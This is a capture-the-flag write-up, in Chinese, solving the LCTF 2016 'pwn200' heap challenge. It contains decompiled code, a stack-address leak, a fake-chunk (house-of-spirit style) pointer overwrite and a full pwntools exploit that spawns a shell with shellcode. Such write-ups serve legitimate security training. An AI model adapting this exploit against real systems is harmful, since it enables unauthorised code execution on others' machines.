LCTF_2016 Pwn200

lctf2016_pwn200

int vuln()
{
  __int64 i; // [rsp+10h] [rbp-40h]
  char v2[48]; // [rsp+20h] [rbp-30h] BYREF

  puts("who are u?");
  for ( i = 0; i <= 47; ++i )
  {
    read(0, &v2[i], 1u);
    if ( v2[i] == 10 )
    {
      v2[i] = 0;
      break;
    }
  }
  printf("%s, welcome to ISCC~ \n", v2);
  puts("give me your id ~~?");
  id();
  return head();
}

int id()
{
    char nptr[8]; // [rsp+0h] [rbp-10h] BYREF
    int v2; // [rsp+8h] [rbp-8h]
    int j; // [rsp+Ch] [rbp-4h]

    v2 = 0;
    for ( j = 0; j <= 3; ++j )
    {
        read(0, &nptr[j], 1u);
        if ( nptr[j] == 10 )  // 换行
        {
            nptr[j] = 0;
            break;
        }
        if ( nptr[j] > '9' || nptr[j] <= '/' )      // 如果不是0-9,那就输出对应字符的ASCLL
        {
            printf("0x%x ", nptr[j]);
            return 0;
        }
    }
    v2 = atoi(nptr);
    if ( v2 >= 0 )
        return atoi(nptr);
    else
        return 0;
}

int head()
{
  char buf[56]; // [rsp+0h] [rbp-40h] BYREF
  char *dest; // [rsp+38h] [rbp-8h]

  dest = (char *)malloc(0x40u);
  puts("give me money~");
  read(0, buf, 0x40u);
  strcpy(dest, buf);
  ptr = dest;
  return sub_4009C4();
}

这里开辟了 0x40 的空间，不过数组只有 0x38 的大小的大小，可以堆溢出

开辟一个 0x40 的空间，ptr 指向的就是 chunk 地址

int sub_4009C4()
{
  int n2; // eax

  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      n2 = id();
      if ( n2 != 2 )
        break;
      free_0();
    }
    if ( n2 == 3 )
      break;
    if ( n2 == 1 )
      add();
    else
      puts("invalid choice");
  }
  return puts("good bye~");
}

int menu()
{
  return printf("\n=======EASY HOTEL========\n1. check in\n2. check out\n3. goodbye\nyour choice : ");
}

void free_0()
{
  if ( ptr )
  {
    puts("out~");
    free(ptr);
    ptr = 0;
  }
  else
  {
    puts("havn't check in");
  }
}

free 之后置 0，不存在 UAF

int add()
{
  int nbytes; // [rsp+Ch] [rbp-4h]

  if ( ptr )
    return puts("already check in");
  puts("how long?");
  nbytes = id();
  if ( nbytes <= 0 || nbytes > 128 )
    return puts("invalid length");
  ptr = malloc(nbytes);
  printf("give me more money : ");
  printf("\n%d\n", nbytes);
  read(0, ptr, (unsigned int)nbytes);
  return puts("in~");
}

如果当前指针为空，则开辟指定大小的空间。

泄露栈上的地址

首先我们的数据都是写到栈上的，我们需要去泄露栈上的地址：

from pwn import *
 
p = process('./pwn200')
# p = remote("node5.buuoj.cn",25852)
context(os='linux', arch='amd64', log_level='debug')

payload1 = b'b'*0x30
p.sendafter("who are u?\n", payload1)
# gdb.attach(p)
p.recvuntil(payload1)
rbp = u64(p.recvn(6).ljust(8, b'\x00'))
info(hex(rbp))

# gdb.attach(p)
p.sendlineafter("id ~~?\n", b'32')
    
p.sendafter("money~\n", b'a'*0x38)
gdb.attach(p)
 
p.interactive()

则：

shell_addr = rbp - 0x50
fake_chunk = rbp - 0x90

我们发现 buf 数组一共是 56 个字节 0x38，但是一共可以输入 0x40 个字节，我们就可以通过溢出修改dest 指针

修改 dest 指向 fake_chunk

这里是一个 off-by-one

-0000000000000040 // Use data definition commands to manipulate stack variables and arguments.
-0000000000000040 // Frame size: 40; Saved regs: 8; Purge: 0
-0000000000000040
-0000000000000040     char buf;
-000000000000003F     // padding byte
-000000000000003E     // padding byte
-000000000000003D     // padding byte
-000000000000003C     // padding byte
-000000000000003B     // padding byte
-......
-000000000000000E     // padding byte
-000000000000000D     // padding byte
-000000000000000C     // padding byte
-000000000000000B     // padding byte
-000000000000000A     // padding byte
-0000000000000009     // padding byte
-0000000000000008     _QWORD dest __char;
+0000000000000000     _QWORD __saved_registers;
+0000000000000008     _UNKNOWN *__return_address;

p= process('./pwn200')
# p = remote("node5.buuoj.cn",25852)
context(os='linux', arch='amd64', log_level='debug')

shellcode = asm(shellcraft.amd64.linux.sh(),arch='amd64')

payload = shellcode.ljust(0x30)
p.sendafter("who are u?\n", payload)
# gdb.attach(p)
p.recvuntil(payload)
rbp = u64(p.recvn(6).ljust(8, b'\x00'))
print(hex(rbp))
shell_addr = rbp - 0x50
fake_chunk = rbp - 0x90
# gdb.attach(p)
p.sendlineafter("id ~~?\n", b'32')

payload = p64(0) * 4 + p64(0) + p64(0x41)
payload = payload.ljust(56, b'\x00') + p64(fake_chunk)

p.sendafter("money~\n", payload)

gdb.attach(p)

payload = p64(0) * 4 + p64(0) + p64(0x41)
payload = payload.ljust(56, b'\x00') + p64(fake_chunk)
// 解释一下这一部分：我们已知可以填充0x40的大小，想要伪造一个堆块，就需要先创建相同大小的堆块
   p64(0)*4用于填充,之后是prev_size和size
   之后再填充到0x38,以\x00截断strcpy，让最后的fake_chunk一直覆盖在dest->ptr指针

这样子也就导致指针并没有指向我们第一次 malloc 的 chunk，而是以 ptr 指向我们的 fake_chunk，free 掉 chunk 的时候释放的也是我们的 fake_chunk，再次申请的时候就会复用我们 fake_chunk 的地址。

free&malloc fake_chunk

p.sendlineafter("your choice : ", '2')

payload = b'a' * 0x18 + p64(shell_addr)
payload = payload.ljust(0x30, b'\x00')
#gdb.attach(p)
#pause()
p.sendlineafter('your choice : ', '1')
p.sendlineafter('how long?\n', str(0x30))
p.sendafter(str(0x30) + '\n',payload)

改 puts 表

之后解释 0x18 覆盖，进行栈溢出，一出道 0x6020B0 去修改 puts 表为 shellcode

调用 shellcode

p.sendlineafter("your choice : ", '3')
p.interactive()

最后调用 shellcode 就可以获取 shell 了。

总 exp

from pwn import *

p = process('./pwn200')
# p = remote("node5.buuoj.cn",25852)
context(os='linux', arch='amd64', log_level='debug')

shellcode = asm(shellcraft.amd64.linux.sh(),arch='amd64')

payload = shellcode.ljust(0x30)
p.sendafter("who are u?\n", payload)
# gdb.attach(p)
p.recvuntil(payload)
rbp = u64(p.recvn(6).ljust(8, b'\x00'))
print(hex(rbp))
shell_addr = rbp - 0x50
fake_chunk = rbp - 0x90
gdb.attach(p)
p.sendlineafter("id ~~?\n", b'32')

payload = p64(0) * 4 + p64(0) + p64(0x41)
payload = payload.ljust(56, b'\x00') + p64(fake_chunk)

p.sendafter("money~\n", payload)

p.sendlineafter("your choice : ", '2')

payload = b'a' * 0x18 + p64(shell_addr)
payload = payload.ljust(0x30, b'\x00')
#gdb.attach(p)
#pause()
p.sendlineafter('your choice : ', '1')
p.sendlineafter('how long?\n', str(0x30))
p.sendafter(str(0x30) + '\n',payload)

p.sendlineafter("your choice : ", '3')
p.interactive()

更新: 2026-03-20 16:24:59
原文: https://www.yuque.com/idcm/wnemg9/nzub5v3up8kq8gx1